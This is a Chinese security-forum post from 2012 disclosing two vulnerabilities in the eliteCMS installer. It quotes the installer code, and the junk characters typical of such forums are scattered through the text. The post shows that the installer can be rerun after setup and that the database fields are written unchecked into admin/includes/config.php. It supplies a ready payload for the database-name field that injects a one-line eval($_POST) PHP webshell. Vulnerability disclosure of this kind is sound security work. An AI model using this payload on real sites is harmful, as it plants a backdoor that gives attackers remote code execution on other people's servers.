找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2272|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
" M! I% R' Q0 W4 Q5 A8 A& C  f: x* F. T9 t
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php% Q/ t8 r# M( z5 ?
我们来看代码:7 a/ t6 @2 d! n! k. U: r2 x* X( O- R
. s" ?7 X# Q# e, z
...
8 v' B8 S. f- a- ~elseif ($_GET['step'] == "4") {$ Z0 X6 T: ^& G3 k0 [3 o
    $file = "../admin/includes/config.php";
* \( ?+ r8 _: @% p& S2 s! n+ h    $write = "<?php\n";
$ }0 i" a- Z/ T6 |    $write .= "/**\n";
( p! z; ^! C% b8 a+ [) _    $write .= "*\n";3 S. q! ?8 V& l/ C! ?- E
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";3 e; l: c% ]4 S# _
...略...
$ F1 C9 `& b& |6 P( O) r( Q    $write .= "*\n";
8 h- U5 Q: H) ^( j, w    $write .= "*/\n";
5 y7 n3 y) r; W  t: w6 U. v+ C    $write .= "\n";2 {$ |7 w2 U( e" L
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
+ v' r2 o9 e$ d+ Y& h% @9 }) w    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";9 n" A( r. s! l7 ?
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";& _) Y3 F4 m: \/ q) _
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";  n% k! H4 L) E# b- D2 A
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";- }8 o' a6 L9 F, A, D
    $write .= "if (!\$connection) {\n";! g; j) O( y; c) c, l0 p
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
0 C4 K9 B% q) i. C    $write .= "        \n";
# \4 Q) Z+ X; u) X! r# y    $write .= "} \n";2 }3 w9 l/ m4 T7 D; g7 w
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";* f: V: X2 x. R  j
    $write .= "if (!\$db_select) {\n";% @$ o) ~* `' Y6 Z* R5 Z
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
, Q/ y' x0 k, c1 n9 c/ a+ q    $write .= "        \n";
' V. K  d) K# d/ P; B& a: K" d    $write .= "} \n";
8 e5 t" [: W* T! n6 q    $write .= "?>\n";  X* }) J. c' `+ X4 n9 h

  H/ c* P  U* N( p1 M# p2 ~% S    $writer = fopen($file, 'w');
& E* r1 O' `. E, M2 ]...
- K5 W. f2 e- z3 b- C8 k/ [1 Y ! B- L0 M9 t( @) p+ x
在看代码:$ M+ c8 A1 k5 m1 d+ T, C! ]: R
! W% m, X8 K" u4 L' M; e1 M+ Z4 p
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];! F% `: R8 x0 O) p& k
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
' V7 U9 q+ w/ l) w2 Y+ @( G4 H% `$_SESSION['DB_USER'] = $_POST['DB_USER'];
, Q4 ^. ?) i5 c3 Q. |0 R+ B6 t/ G9 v$_SESSION['DB_PASS'] = $_POST['DB_PASS'];! M) V( h' M3 n# t% @
2 m' t7 A0 c, a- [. e+ E
取值未作任何验证- v, S" Q$ ~) X- }2 k" A1 n
如果将数据库名POST数据:+ V7 J! m! j  U
# U, S0 Q& U% j5 s
"?><?php eval($_POST[c]);?><?php
1 V! G/ |3 K# b" W& |. | ( L# I& d' \3 l7 E) F
将导致一句话后门写入/admin/includes/config.php
& A. c/ G6 T8 X& M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表